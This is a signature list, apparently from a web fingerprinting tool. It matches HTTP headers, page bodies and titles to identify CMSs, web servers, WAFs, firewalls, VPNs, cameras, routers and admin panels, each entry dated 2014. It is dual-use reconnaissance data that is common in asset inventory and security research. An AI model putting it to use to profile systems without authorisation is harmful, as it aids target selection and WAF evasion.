("1und1", "http://1und1.de", "9/22/2014", [{"body": ["/shop/catalog/browse?sessid="]}]),
("TechartCMS", "http://www.techart.ru", "9/22/2014", [{"header": ["X-Powered-Cms: Techart CMS"]}]),
("TwilightCMS", "http://www.twl.ru", "9/22/2014", [{"header": ["X-Powered-Cms: Twilight CMS"]}]),
("WMSN", "http://wmsn.biz/", "9/22/2014", [{"header": ["X-Powered-Cms: WMSN"]}]),
("SubrionCMS", "http://www.subrion.com", "9/22/2014", [{"header": ["X-Powered-Cms: Subrion CMS"]}]),
("BPanelCMS", "http://www.bpanel.net", "9/22/2014", [{"header": ["X-Powered-Cms: BPanel CMS"]}]),
("FOXI BIZzz", "http://foxi.biz", "9/22/2014", [{"header": ["X-Powered-Cms: FOXI BIZzz"]}]),
("BitrixSiteManager", "http://www.1c-bitrix.ru", "9/22/2014", [{"header": ["X-Powered-Cms: Bitrix Site Manager"]}]),
("EleanorCMS", "http://eleanor-cms.ru", "9/22/2014", [{"header": ["Eleanor CMS"]}]),
("Z-BlogPHP", "http://www.zblogcn.com", "9/22/2014", [{"header": ["Product: Z-BlogPHP"]}]),
("Typecho", "http://typecho.org", "9/22/2014",
[{"body": ["generator\" content=\"Typecho"]}, {"body": ["强力驱动", "Typecho"]}]),
("护卫神网站安全系统", "http://www.huweishen.com", "9/19/2014", [{"title": ["护卫神.网站安全系统"]}]),
("护卫神主机管理", "http://www.huweishen.com", "9/19/2014", [{"title": ["护卫神·主机管理系统"]}]),
("LUM服务器管理", "http://www.lum.net.cn", "9/19/2014", [{"header": ["LUM_SESSION"]}]),
("蓝盾BDWebGuard", "http://www.bluedon.com/product/category/4.html", "9/18/2014",
[{"body": ["BACKGROUND: url(images/loginbg.jpg) #e5f1fc"]}]),
("MOBOTIX_Camera", "http://www.mobotix.com/", "9/18/2014", [{"header": ["MOBOTIX Camera"]}]),
("ECOR", "http://www.everfocus.de/", "9/18/2014", [{"header": ["ECOR264"]}]),
("TP-LINK", "http://www.tp-link.tw/products/?categoryid=201", "9/18/2014", [{"header": ["TP-LINK"]}]),
("HuaweiHomeGateway", "http://www.huawei.com", "9/18/2014", [{"header": ["HuaweiHomeGateway"]}]),
("APC_Management", "http://www.apc.com/", "9/18/2014",
[{"header": ["APC Management Card"]}, {"body": ["This object on the APC Management Web Server is protected"]}]),
("Allegro-Software-RomPager", "http://www.allegrosoft.com/embedded-web-server", "9/18/2014",
[{"header": ["Allegro-Software-RomPager"]}]),
("CCProxy", "http://www.ccproxy.com", "9/18/2014", [{"header": ["Server: CCProxy"]}]),
("DI-804HV", "http://www.dlink.com/xk/sq/support/product/di-804hv-broadband-vpn-router", "9/18/2014",
[{"header": ["DI-804HV"]}]),
("AirLink_modem", "http://www.airLink.com", "9/18/2014", [{"header": ["Modem@AirLink.com"]}]),
("moosefs", "http://www.moosefs.org", "9/17/2014", [{"body": ["mfs.cgi"]}, {"body": ["under-goal files"]}]),
("WHM", "http://cpanel.net/cpanel-whm/", "9/17/2014", [{"header": ["whostmgrsession"]}]),
("用友商战实践平台", "http://tradewar.135e.com", "9/17/2014", [{"body": ["Login_Main_BG", "Login_Owner"]}]),
("ZTE_MiFi_UNE", "http://www.zte.com.cn/cn/", "9/17/2014", [{"title": ["MiFi UNE 4G LTE"]}]),
("rap", "http://www.arubanetworks.com.cn/allwireless/", "9/17/2014", [{"body": ["/jscripts/rap_util.js"]}]),
("Scientific-Atlanta_Cable_Modem", "http://www.cisco.com/web/services/acquisitions/scientific-atlanta.html",
"9/17/2014", [{"title": ["Scientific-Atlanta Cable Modem"]}]),
("Aethra_Telecommunications_Operating_System", "http://www.aethra.com", "9/17/2014", [{"header": ["atos"]}]),
("Cisco_Cable_Modem", "http://www.cisco.com", "9/17/2014", [{"title": ["Cisco Cable Modem"]}]),
("Wimax_CPE", "http://www.huawei.com/cn/ProductsLifecycle/RadioAccessProducts/WiMAXProducts/hw-194630.htm",
"9/17/2014", [{"title": ["Wimax CPE Configuration"]}]),
("HFS", "http://www.rejetto.com/hfs/", "9/16/2014", [{"header": ["Server: HFS"]}]),
("Macrec_DVR", "http://macrec.co", "9/16/2014", [{"title": ["Macrec DVR"]}]),
("CrushFTP", "http://www.crushftp.com", "9/16/2014", [{"header": ["Server: CrushFTP HTTP Server"]}]),
("SMA_Sunny_Webbox", "http://www.sma-america.com/en_US/products/monitoring-systems/sunny-webbox.html", "9/16/2014",
[{"title": ["SMA Sunny Webbox"]}, {"header": ["Server: WebBox-20"]}]),
("ecshop", "http://www.ecshop.com/", "9/16/2014",
[{"title": ["Powered by ECShop"]}, {"header": ["ECS_ID"]}, {"body": ["content=\"ECSHOP"]},
{"body": ["/api/cron.php"]}]),
("gunicorn", "http://gunicorn.org", "9/16/2014", [{"header": ["gunicorn"]}]),
("Sucuri", "https://sucuri.net", "9/15/2014", [{"header": ["Sucuri/Cloudproxy"]}]),
("WebKnight", "https://www.aqtronix.com/webknight/", "9/15/2014", [{"header": ["WebKnight"]}]),
("PaloAlto_Firewall", "https://www.paloaltonetworks.com", "9/15/2014", [{"body": [
"Access to the web page you were trying to visit has been blocked in accordance with company policy"]}]),
("FortiWeb", "http://www.fortinet.com.tw/products/fortiweb/", "9/15/2014",
[{"header": ["FORTIWAFSID"]}, {"header": ["FortiWeb"]}]),
("Mod_Security", "https://www.modsecurity.org", "9/15/2014", [{"header": ["Mod_Security"]}]),
("Citrix_Netscaler", "http://www.citrix.com.tw/products/netscaler-application-delivery-controller/overview.html",
"9/15/2014", [{"header": ["ns_af"]}]),
("Dotdefender", "http://www.applicure.com/Products/dotdefender", "9/15/2014",
[{"header": ["X-Dotdefender-Denied"]}]),
("Kerio_WinRoute_Firewall", "http://winroute.ru/kerio_winroute_firewall.htm", "9/15/2014",
[{"header": ["Kerio WinRoute Firewall"]}, {"body": ["style/bodyNonauth.css"]}]),
("Motorola_SBG900",
"http://www.motorolasolutions.com/CN-ZH/Business+Solutions/Industry+Solutions/Utilities/Wireless+Broadband+Solution_CN-ZH",
"9/12/2014", [{"title": ["Motorola SBG900"]}]),
("Ruckus", "http://www.ruckuswireless.com", "9/12/2014",
[{"body": ["mon. Tell me your username"]}, {"title": ["Ruckus Wireless Admin"]}]),
("ZyXEL", "http://www.zyxel.com/cn/zh/products_services/service_provider-dsl_cpes.shtml?t=c", "9/12/2014",
[{"body": ["Forms/rpAuth_1"]}]),
("Horde", "http://www.horde.org/apps/webmail", "9/12/2014",
[{"body": ["IMP: Copyright 2001-2009 The Horde Project"]}, {"header": ["Horde3"]},
{"header": ["Set-Cookie: Horde"]}]),
("Roundcube", "http://roundcube.net", "9/12/2014", [{"header": ["roundcube_sessid"]}]),
("Comcast_Business_Gateway", "http://business.comcast.com/", "9/12/2014", [{"body": ["Comcast Business Gateway"]}]),
("teamportal", "http://www.teamsystem.com", "9/12/2014", [{"body": ["TS_expiredurl"]}]),
("Lotus-Domino", "http://www-03.ibm.com/software/products/en/ibmdomino", "9/12/2014",
[{"header": ["Server: Lotus-Domino"]}]),
("Lotus", "http://ibm.com", "9/12/2014", [{"title": ["IBM Lotus iNotes Login"]}, {"body": ["iwaredir.nsf"]}]),
("arrisi_Touchstone", "http://www.arrisi.com/products/touchstone/", "9/12/2014",
[{"title": ["Touchstone Status"]}, {"body": ["passWithWarnings"]}]),
("Zimbra", "http://www.zimbra.com", "9/12/2014", [{"header": ["ZM_TEST"]}]),
("DnP Firewall", "http://ipv6.google.com.hk/search?q=DnP+Firewall", "9/12/2014",
[{"body": ["Powered by DnP Firewall"]}, {"body": ["dnp_firewall_redirect"]}]),
("BinarySec", "http://www.binarysec.com/", "9/12/2014", [{"header": ["X-Binarysec-Via"]}]),
("AnZuWAF", "http://www.fsg2.org", "9/12/2014", [{"header": ["AnZuWAF"]}]),
("Safe3WAF", "http://www.safe3.com.cn", "9/12/2014", [{"header": ["Safe3WAF"]}]),
("AOLserver", "http://aolserver.sourceforge.net", "9/12/2014", [{"header": ["AOLserver"]}]),
("D-Link", "http://www.dlink.com.hk/products/?pid=446", "9/12/2014",
[{"title": ["D-Link VoIP Wireless Router"]}, {"title": ["D-LINK SYSTEMS"]}]),
("FreeboxOS", "http://www.free.fr/assistance/5056.html", "9/12/2014",
[{"title": ["Freebox OS"]}, {"body": ["logo_freeboxos"]}]),
("MediaWiki", "http://www.mediawiki.org/wiki/MediaWiki", "9/11/2014",
[{"body": ["generator\" content=\"MediaWiki"]}, {"body": ["/wiki/images/6/64/Favicon.ico"]},
{"body": ["Powered by MediaWiki"]}]),
("Jenkins", "http://jenkins-ci.org", "9/11/2014",
[{"header": ["X-Jenkins-Session"]}, {"body": ["translation.bundles"]}, {"header": ["X-Jenkins"]}]),
("reviewboard", "https://www.reviewboard.org", "9/11/2014",
[{"body": ["/static/rb/images/delete"]}, {"header": ["rbsessionid"]}]),
("Phabricator", "http://phabricator.org", "9/11/2014",
[{"header": ["phsid"]}, {"body": ["phabricator-application-launch-container"]}, {"body": ["res/phabricator"]}]),
("mod_auth_passthrough", "http://cpanel.net", "9/11/2014", [{"header": ["mod_auth_passthrough"]}]),
("mod_bwlimited", "http://ipv6.google.com.hk/search?q=mod_bwlimited", "9/11/2014", [{"header": ["mod_bwlimited"]}]),
("OpenSSL", "http://openssl.org", "9/11/2014", [{"header": ["OpenSSL"]}]),
("lemis管理系统", "http://www.baidu.com/s?wd=lemis%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F", "9/11/2014",
[{"body": ["lemis.WEB_APP_NAME"]}]),
("unknown_cms_rcms", "http://fofa.so/", "9/11/2014", [{"body": ["r/cms/www"]}, {"header": ["clientlanguage"]}]),
("joomla-facebook", "https://www.sourcecoast.com/joomla-facebook/", "9/11/2014",
[{"header": ["jfbconnect_permissions_granted"]}]),
("ranzhi", "http://www.ranzhi.org", "9/11/2014",
[{"body": ["/sys/index.php?m=user&f=login&referer="]}, {"header": ["rid", "theme", "lang"]}]),
("chanzhi", "http://www.chanzhi.org", "9/11/2014", [{"body": ["chanzhi.js"]}, {"header": ["Set-Cookie: frontsid"]},
{"body": ["poweredBy'><a href='http://www.chanzhi.org"]}]),
("unbouncepages", "http://unbouncepages.com", "9/11/2014", [{"header": ["X-Unbounce-Pageid"]}]),
("unknown_cms", "http://ipv6.google.com.hk/#q=%22Requestsuccess4ajax%22", "9/11/2014",
[{"header": ["Requestsuccess4ajax"]}]),
("Alternate-Protocol", "http://www.chromium.org/spdy/spdy-protocol/spdy-protocol-draft2", "9/11/2014",
[{"header": ["Alternate-Protocol"]}]),
("pagespeed", "https://github.com/pagespeed", "9/11/2014",
[{"header": ["X-Page-Speed"]}, {"header": ["X-Mod-Pagespeed"]}]),
("TRSMAS", "http://www.trs.com.cn", "9/11/2014", [{"header": ["X-Mas-Server"]}]),
("Wp-Super-Cache", "https://wordpress.org/plugins/wp-super-cache/", "9/11/2014", [{"header": ["Wp-Super-Cache"]}]),
("Cocoon", "http://cocoon.apache.org", "9/11/2014", [{"header": ["X-Cocoon-Version"]}]),
("LiquidGIS", "http://www.liquidgis.com/", "9/11/2014", [{"header": ["Productname: LiquidGIS"]}]),
("Cacti", "http://www.cacti.net", "9/11/2014", [{"header": ["Set-Cookie: Cacti="]}, {"title": ["Login to Cacti"]},
{"body": ["/plugins/jqueryskin/include/login.css"]}]),
("Cactiez", "http://www.cactiez.com", "9/11/2014", [{"header": ["Cactiez"]}]),
("uPlusFtp", "http://www.erisesoft.com/cn/uplusftp.htm", "9/11/2014", [{"header": ["uPlusFtp"]}]),
("SJSWS_ OiWS", "http://www.oracle.com/technetwork/middleware/webtier/overview/index.html#iWS", "9/11/2014",
[{"header": ["Oracle-iPlanet-Web-Server"]}, {"header": ["Sun-Java-System-Web-Server"]}]),
("SJSWPS_ OiWPS", "http://www.oracle.com/technetwork/middleware/webtier/overview/index.html#iPS", "9/11/2014",
[{"header": ["Sun-Java-System-Web-Proxy-Server"]}, {"header": ["Oracle-iPlanet-Proxy-Server"]}]),
("Blackboard", "http://www.blackboard.com/Platforms/Learn/overview.aspx", "9/11/2014",
[{"header": ["X-Blackboard-Product"]}, {"header": ["X-Blackboard-Appserver"]}]),
("Adblock", "https://adblockplus.org", "9/11/2014", [{"header": ["X-Adblock-Key"]}]),
("Kooboocms", "http://kooboo.com", "9/11/2014", [{"header": ["Kooboocms"]}]),
("安慧网盾", "http://www.huianquan.com", "9/11/2014", [{"header": ["Protected-By: AnHui Web Firewall"]}]),
("plone", "http://plone.org/", "9/11/2014",
[{"header": ["plone.content"]}, {"body": ["generator\" content=\"Plone"]}]),
("ManagedFusion", "http://managedfusion.com/products/url-rewriter/", "9/11/2014", [{"header": ["ManagedFusion"]}]),
("X-72e-Nobeian-Transfer", "http://ipv6.google.com.hk/#q=%22X-72e-Nobeian-Transfe", "9/11/2014",
[{"header": ["X-72e-Nobeian-Transfer"]}]),
("P3p_enabled", "http://www.w3.org/P3P/", "9/11/2014", [{"header": ["P3p: CP"]}]),
("Oraclea-DMS", "http://docs.oracle.com/cd/E21764_01/core.1111/e10108/dms.htm#ASPER295", "9/11/2014",
[{"header": ["X-Oracle-Dms-Ecid"]}]),
("Powercdn", "http://www.powercdn.com", "9/11/2014", [{"header": ["Powercdn"]}]),
("Iisexport", "http://www.adsonline.co.uk/iisexport/documentation/", "9/11/2014", [{"header": ["Iisexport"]}]),
("DotNetNuke", "http://www.dnnsoftware.com/", "9/11/2014",
[{"header": ["DotNetNukeAnonymous"]}, {"header": ["Dnnoutputcache"]}]),
("Dnnoutputcache", "http://www.dnnsoftware.com/", "9/11/2014", [{"header": ["Dnnoutputcache"]}]),
("rack-cache", "http://rtomayko.github.io/rack-cache/", "9/11/2014", [{"header": ["X-Rack-Cache"]}]),
("wspx", "http://ipv6.google.com.hk/search?q=%22X-Copyright:+wspx", "9/11/2014",
[{"header": ["X-Copyright: wspx"]}, {"header": ["X-Powered-By: ANSI C"]}]),
("CodeIgniter", "https://ellislab.com/codeigniter", "9/11/2014", [{"header": ["ci_session"]}]),
("CEMIS", "http://www.reachway.com.cn/web/cemis/introduction.aspx", "9/10/2014",
[{"title": ["综合项目管理系统登录"], "body": ["<div id=\"demo\" style=\"overflow:hidden"]}]),
("云因网上书店", "http://www.yunyin.com/product/product12.cfm?iType=12&sProName=%D4%C6%D2%F2%CD%F8%D5%BE%CF%B5%CD%B3",
"9/10/2014", [{"body": ["main/building.cfm"]}, {"body": ["href=\"../css/newscomm.css"]}]),
("bit-service", "http://www.bit-service.com/index.html", "9/10/2014",
[{"body": ["bit-xxzs"]}, {"body": ["xmlpzs/webissue.asp"]}]),
("baidu广告联盟", "http://yingxiao.baidu.com/support/adm/index.html", "9/10/2014",
[{"body": ["http://cpro.baidu.com/cpro/ui/c.js"]}, {"body": ["http://cbjs.baidu.com/js/m.js"]}]),
("doubleclick_ad", "http://www.google.com/doubleclick/", "9/10/2014", [{"body": ["ad.doubleclick.net"]}]),
("Acidcat_CMS", "http://www.acidcat.com/", "9/10/2014",
[{"body": ["Start Acidcat CMS footer information"]}, {"body": ["Powered by Acidcat CMS"]}]),
("ABO_CMS", "http://www.abocms.com/", "9/10/2014", [{"header": ["a-powered-by"]}]),
("6kbbs", "http://www.6kbbs.com", "9/10/2014",
[{"body": ["Powered by 6kbbs"]}, {"body": ["generator\" content=\"6KBBS"]}]),
("3COM_NBX", "http://inpath.com/products/3com-nbx.html", "9/10/2014",
[{"title": ["NBX NetSet"]}, {"body": ["NBX"], "header": ["Alternates"]}]),
("360webfacil_360WebManager", "http://www.360webfacil.com", "9/10/2014",
[{"body": ["publico/template/", "zonapie"]}, {"body": ["360WebManager Software"]}]),
("1024cms", "http://www.1024cms.com", "9/10/2014",
[{"body": ["Powered by 1024 CMS"]}, {"body": ["generator\" content=\"1024 CMS (c)"]}]),
("MS-Author-Via", "http://msdn.microsoft.com/en-us/library/cc250246.aspx", "9/10/2014",
[{"header": ["MS-Author-Via"]}]),
("Aicache", "http://aiscaler.com", "9/10/2014", [{"header": ["X-Aicache"]}]),
("Varnish", "https://www.varnish-cache.org", "9/10/2014", [{"header": ["X-Varnish"]}]),
("sharepoint", "http://microsoft.com/", "9/10/2014",
[{"header": ["Microsoftsharepointteamservices"]}, {"header": ["X-Sharepointhealthscore"]}]),
("TCN协议", "https://www.ietf.org/rfc/rfc2295.txt", "9/10/2014",
[{"header": ["Tcn: choice"]}, {"header": ["Tcn: list"]}]),
("Aspnetmvc", "http://www.asp.net/mvc", "9/10/2014", [{"header": ["Aspnetmvc"]}]),
("FrontPageServerExtension", "http://microsoft.com/", "9/10/2014", [{"header": ["Microsoftofficewebserver"]}]),
("weidun", "http://www.weidun.com.cn", "9/10/2014", [{"header": ["Firewall: www.weidun.com.cn"]}]),
("Swiftlet", "http://swiftlet.org", "9/9/2014", [{"header": ["Swiftlet"]}]),
("webray", "http://www.webray.com.cn/", "9/9/2014", [{"header": ["Rayengine"]}, {"header": ["Drivedby: RaySrv"]}]),
("we7", "http://www.we7.cn", "9/9/2014", [{"body": ["/Widgets/WidgetCollection/"]}]),
("ASP", "http://www.iis.net/", "9/9/2014", [{"header": ["X-Powered-By: ASP"]}]),
("nodejs", "http://nodejs.org", "9/9/2014",
[{"header": ["X-Powered-By: Express"]}, {"header": ["pump.io"]}, {"header": ["node.js"]}]),
("perl", "http://www.perl.org", "9/9/2014", [{"header": ["perl"]}]),
("jsp", "http://www.oracle.com/technetwork/java/javaee/jsp/index.html", "9/9/2014",
[{"header": ["jsp"]}, {"header": ["Servlet"]}, {"header": ["JBoss"]}, {"header": ["JSESSIONID"]}]),
("ruby", "http://rubyonrails.org", "9/9/2014",
[{"header": ["ruby"]}, {"header": ["WEBrick"]}, {"header": ["Phusion"]}, {"header": ["Mongrel"]},
{"header": ["X-Rack-Cache"]}]),
("python", "https://www.djangoproject.com", "9/9/2014", [{"header": ["python"]}, {"header": ["Django"]}]),
("ASP.NET", "http://www.iis.net/", "9/9/2014", [{"header": ["X-Powered-By: ASP.NET"]}]),
("PHP", "http://www.php.net", "9/9/2014", [{"header": ["X-Powered-By: PHP"]}]),
("awstats", "http://www.awstats.org/", "9/9/2014", [{"body": ["awstats.pl?config="]}]),
("awstats_admin", "http://www.awstats.org/", "9/9/2014",
[{"body": ["generator\" content=\"AWStats"]}, {"body": ["<frame name=\"mainleft\" src=\"awstats.pl?config="]}]),
("awstats_misc_tracker", "http://www.awstats.org", "9/9/2014", [{"body": ["/js/awstats_misc_tracker.js"]}]),
("easypanel", "http://www.kanglesoft.com/forum.php?gid=50", "9/9/2014",
[{"body": ["/vhost/view/default/style/login.css"]}]),
(
"kangle反向代理", "http://www.kanglesoft.com", "9/9/2014", [{"header": ["kangle"]}, {"title": ["welcome use kangle"]}]),
("trs_wcm", "http://www.trs.com.cn/product/product-wcm.html", "9/4/2014",
[{"body": ["/wcm/app/js"]}, {"body": ["0;URL=/wcm"]}, {"body": ["window.location.href = \"/wcm\";"]},
{"body": ["forum.trs.com.cn", "wcm"]}, {"body": ["/wcm\" target=\"_blank\">网站管理"]},
{"body": ["/wcm\" target=\"_blank\">管理"]}]),
("AD_RS设备", "http://ipv6.google.com.hk/#newwindow=1&q=AD_RS_COOKIE", "9/4/2014", [{"header": ["AD_RS_COOKIE"]}]),
("万户ezOFFICE", "http://www.whir.net/cn/ezofficeqyb/index_52.html", "9/4/2014", [{"header": ["LocLan"]}]),
("yui", "http://yuilibrary.com", "9/4/2014", [{"body": ["yui.js"]}, {"body": ["yui.min.js"]}]),
("d3", "http://mbostock.github.com/d3/", "9/4/2014",
[{"body": ["/d3.min.js"]}, {"body": ["/d3.v2.min.js"]}, {"body": ["/d3.js"]}, {"body": ["/d3.v2.js"]}]),
("313自助建站", "http://www.313.com.cn", "9/4/2014", [{"header": ["313CMS"]}]),
("F5_BIGIP", "http://www.f5.com.cn", "9/4/2014",
[{"header": ["BIGipServer"]}, {"header": ["X-WA-Info"]}, {"header": ["X-PvInfo"]}]),
("泛微协同办公OA", "http://www.weaver.com.cn/products/enature_info.asp", "9/3/2014",
[{"header": ["testBanCookie"]}, {"body": ["/wui/common/css/w7OVFont.css"]}]),
("juniper_vpn", "http://www.juniper.net/cn/zh/products-services/", "9/3/2014", [{"body": ["welcome.cgi?p=logo"]}]),
("zabbix", "http://www.zabbix.com", "9/3/2014",
[{"body": ["images/general/zabbix.ico"]}, {"header": ["zbx_sessionid"]}]),
("GeoTrust_cert", "http://www.geotrust.com", "9/2/2014", [{"body": ["//smarticon.geotrust.com/si.js"]}]),
("globalsign_cert", "http://cn.globalsign.com", "9/2/2014", [{"body": ["//seal.globalsign.com/SiteSeal"]}]),
("webtrust_cert", "https://cert.webtrust.org", "9/2/2014", [{"body": ["https://cert.webtrust.org/ViewSeal"]}]),
("wosign_ssl_cert", "https://www.wosign.cn", "9/2/2014",
[{"body": ["https://seal.wosign.com/tws.js"]}, {"body": ["https://seal.wosign.com/Signature"]}]),
("thawte_ssl_cert", "https://www.thawte.com/ssl/index.html", "9/2/2014",
[{"body": ["https://seal.thawte.com/getthawteseal"]}]),
("360网站安全检测", "http://webscan.360.cn", "9/1/2014", [{"body": ["webscan.360.cn/status/pai/hash"]}]),
("Bugzilla", "http://www.bugzilla.org", "9/1/2014",
[{"body": ["enter_bug.cgi"]}, {"body": ["/cgi-bin/bugzilla/"]}, {"header": ["Bugzilla_login_request_cookie"]},
{"title": ["Bugzilla Main Page"]}]),
("o2security_vpn", "http://www.o2security.net", "9/1/2014", [{"header": ["client_param=install_active"]}]),
(
"天融信防火墙", "http://www.topsec.com.cn", "9/1/2014", [{"body": ["WEB User Interface"]}, {"header": ["TopWebServer"]}]),
("Array_Networks_VPN", "http://www.arraynetworks.com", "9/1/2014", [{"body": ["an_util.js"]}]),
("天融信VPN", "http://www.topsec.com.cn/aqcp/bjaq/xnzwvpn/ipsecvpnxlcp/index.htm", "9/1/2014",
[{"header": ["TopWebServer"]}, {"header": ["topsecsvportalname"]}]),
("深信服ssl-vpn", "http://www.sangfor.com.cn/product/ssl_vpn/outline.html", "9/1/2014",
[{"body": ["login_psw.csp"]}, {"header": ["TWFID"]}]),
("exchange", "http://office.microsoft.com/zh-cn/exchange/FX103765014.aspx", "9/1/2014",
[{"header": ["owa"]}, {"body": ["owaLgnBdy"]}, {"header": ["OutlookSession"]}]),
("苏亚星校园管理系统", "http://www.suyaxing.com/product.aspx", "8/31/2014", [{"body": ["/ws2004/Public/"]}]),
("gocdn", "http://baidu.com/?q=gocdn", "8/31/2014", [{"header": ["GOCDN"]}]),
("zentao", "http://www.zentao.net", "8/31/2014",
[{"body": ["欢迎使用禅道集成运行环境"]}, {"body": ["powered by <a href='http://www.zentao.net' target='_blank'>ZenTaoPMS"]}]),
("西部数码", "http://www.west263.com/", "8/28/2014", [{"header": ["WT263CDN"]}]),
("Webluker", "http://www.webluker.com/", "8/28/2014", [{"header": ["Webluker-Edge"]}]),
("快网", "http://www.fastweb.com.cn/", "8/28/2014", [{"header": ["Fw-Via: "]}]),
("帝联", "http://www.dnion.com/", "8/28/2014", [{"header": ["Server: DNION"]}, {"header": ["fastcdn.com"]}]),
("网宿", "http://www.chinanetcenter.com/", "8/28/2014",
[{"header": ["Cdn Cache Server"]}, {"header": ["WS CDN Server"]}]),
("蓝讯", "http://www.chinacache.com/", "8/28/2014", [{"header": ["Powered-By-ChinaCache"]}]),
(
"JBoss", "http://www.jboss.org", "8/28/2014", [{"header": ["JBoss"]}, {"body": ["Manage this JBoss AS Instance"]}]),
("Oracle-Application-Server", "http://www.oracle.com/technetwork/middleware/ias/overview/index.html", "8/28/2014",
[{"header": ["Oracle-Application-Server"]}]),
("Sun-ONE-Web-Server", "http://docs.oracle.com/cd/E19857-01/817-1831-10/agintro.html", "8/28/2014",
[{"header": ["Sun-ONE-Web-Server"]}]),
("Jetty", "http://www.eclipse.org/jetty", "8/28/2014", [{"header": ["Server: Jetty"]}]),
("webrick", "https://rubygems.org/gems/webrick", "8/28/2014", [{"header": ["webrick"]}]),
("Phusion", "https://www.phusionpassenger.com", "8/28/2014", [{"header": ["Phusion"]}]),
("Netscape-Enterprise", "http://docs.oracle.com/cd/E19957-01/816-5648-10/es351jpg.html", "8/28/2014",
[{"header": ["Netscape-Enterprise"]}]),
("Resin", "http://caucho.com", "8/28/2014", [{"header": ["Server: Resin"]}]),
("Zeus", "http://zeus.com", "8/28/2014", [{"header": ["Server: Zeus"]}]),
("ngx_openresty", "http://openresty.org/cn/index.html", "8/28/2014", [{"header": ["ngx_openresty"]}]),
("Microsoft-HTTPAPI", "http://www.microsoft.com", "8/28/2014", [{"header": ["Microsoft-HTTPAPI"]}]),
("LiteSpeed", "http://litespeedtech.com/", "8/28/2014", [{"header": ["Server: LiteSpeed"]}]),
("GSE", "https://code.google.com/p/opengse/", "8/28/2014", [{"header": ["Server: GSE"]}]),
("IBM_HTTP_Server", "http://www-03.ibm.com/software/products/en/http-servers/", "8/28/2014",
[{"header": ["IBM_HTTP_Server"]}]),
("Tengine", "http://tengine.taobao.org", "8/28/2014", [{"header": ["Server: Tengine"]}]),
("Apache", "http://www.apache.org", "8/28/2014", [{"header": ["Server: Apache"]}]),
("Apache-Tomcat", "http://tomcat.apache.org", "8/28/2014",
[{"header": ["Apache-Coyote"]}, {"body": ["<HR size=\"1\" noshade=\"noshade\"><p>"]}]),
("Nginx", "http://nginx.org", "8/28/2014", [{"header": ["Server: nginx"]}]),
("IIS", "http://www.iis.net/", "8/28/2014", [{"header": ["Microsoft-IIS"]}, {"header": ["X-Powered-By: WAF/2.0"]}]),
("Websecurity_WAF", "http://ipv6.google.com.hk/#newwindow=1&q=%22Websecurity:+WAF+1.0%22&start=0", "8/28/2014",
[{"header": ["Websecurity: WAF 1.0"]}]),
("安全狗", "http://www.safedog.cn/", "8/28/2014", [{"header": ["WAF/2.0"]}]),
("wamp", "http://www.wampserver.com/", "8/28/2014", [{"title": ["WAMPSERVER"]}]),
("DVR camera", "http://www.dvrnet.org/", "8/28/2014", [{"title": ["DVR WebClient"]}]),
("UPUPW", "http://www.upupw.net/", "8/28/2014", [{"title": ["UPUPW环境集成包"]}]),
("jcg无线路由器", "http://www.jcgcn.com", "8/28/2014",
[{"title": ["Wireless Router"], "body": ["http://www.jcgcn.com"]}]),
("H3C", "http://www.h3c.com.cn/", "8/28/2014",
[{"header": ["H3C-Miniware-Webs"]}, {"title": ["Web user login"], "body": ["nLanguageSupported"]}]),
("nvdvr", "http://www.nvdvr.net/", "8/28/2014", [{"title": ["XWebPlay"]}]),
("LANMP一键安装包", "http://www.wdlinux.cn/", "8/28/2014", [{"title": ["LANMP一键安装包"]}]),
("中兴路由器", "http://www.zte.com.cn/", "8/28/2014", [{"header": ["Server: Mini web server 1.0 ZTE corp 2005."]}]),
("wdcp管理系统", "http://www.wdlinux.cn/bbs/forum-3-1.html", "8/28/2014",
[{"title": ["wdcp服务器"]}, {"title": ["lanmp_wdcp 安装成功"]}]),
("Hikvision", "http://www.hikvision.com/", "8/28/2014",
[{"header": ["Hikvision"]}, {"header": ["DVRDVS"]}, {"header": ["App-webs"]}, {"header": ["DNVRS"]}]),
("mikrotik", "http://www.mikrotik.com/", "8/28/2014", [{"title": ["RouterOS"], "body": ["mikrotik"]}]),
("imailserver", "http://www.imailserver.com/", "8/28/2014",
[{"body": ["myICalUserName"]}, {"header": ["Ipswitch-IMail"]}]),
("Redmine", "http://www.redmine.org/", "8/28/2014", [{"body": ["Redmine", "authenticity_token"]}]),
("易普拉格科研管理系统", "http://www.e-plugger.com/", "8/28/2014",
[{"body": ["lan12-jingbian-hong"]}, {"body": ["科研管理系统,北京易普拉格科技"]}]),
("360企业版", "http://b.360.cn/", "8/28/2014", [{"body": ["360EntInst"]}]),
("NETSurveillance", "http://www.fh-net.cn/product/class/?119.html", "8/28/2014", [{"title": ["NETSurveillance"]}]),
("ICEFLOW_VPN", "http://www.iceflow.cn/", "8/28/2014", [{"header": ["Server: ICEFLOW"]}]),
("Vmware_vFabric", "http://www.vmware.com/products/vfabric-tcserver/", "8/28/2014",
[{"title": ["vFabric"]}, {"header": ["TS01efd1fa"]}]),
("phpinfo", "http://www.php.net/", "8/28/2014", [{"title": ["phpinfo"], "body": ["Virtual Directory Support"]}]),
("VisualSVN", "http://www.visualsvn.com/server/", "8/28/2014", [{"title": ["VisualSVN Server"]}]),
("瑞友天翼_应用虚拟化系统", "http://www.realor.cn/product/tianyi/", "8/28/2014", [{"title": ["瑞友天翼-应用虚拟化系统"]}]),
("金和协同管理平台", "http://www.jinher.com/chan-pin-ti-xi/c6", "8/28/2014", [{"title": ["金和协同管理平台"]}]),
("EnterCRM", "http://www.entersoft.cn/ProductView.asp?ID=23&SortID=131", "8/28/2014", [{"body": ["EnterCRM"]}]),
("oracle_applicaton_server", "https://www.oracle.com/", "8/28/2014", [{"body": ["OraLightHeaderSub"]}]),
("huawei_auth_server", "http://www.huawei.com/", "8/28/2014", [{"body": ["75718C9A-F029-11d1-A1AC-00C04FB6C223"]}]),
("锐捷NBR路由器", "http://www.ruijie.com.cn/", "8/28/2014", [{"body": ["free_nbr_login_form.png"]}]),
("亿赛通DLP", "http://www.esafenet.com/", "8/28/2014", [{"body": ["CDGServer3"]}]),
("百为路由", "http://www.bytevalue.com/", "8/28/2014", [{"body": ["提交验证的id必须是ctl_submit"]}]),
("Incapsula", "http://www.incapsula.com/", "8/28/2014", [{"header": ["X-Cdn: Incapsula"]}]),
("bxemail", "http://www.bxemail.com", "8/27/2014",
[{"title": ["百讯安全邮件系统"]}, {"title": ["百姓邮局"]}, {"body": ["请输入正确的电子邮件地址,如:abc@bxemail.com"]}]),
("万网企业云邮箱", "http://mail.mxhichina.com/", "8/27/2014", [{"body": ["static.mxhichina.com/images/favicon.ico"]}]),
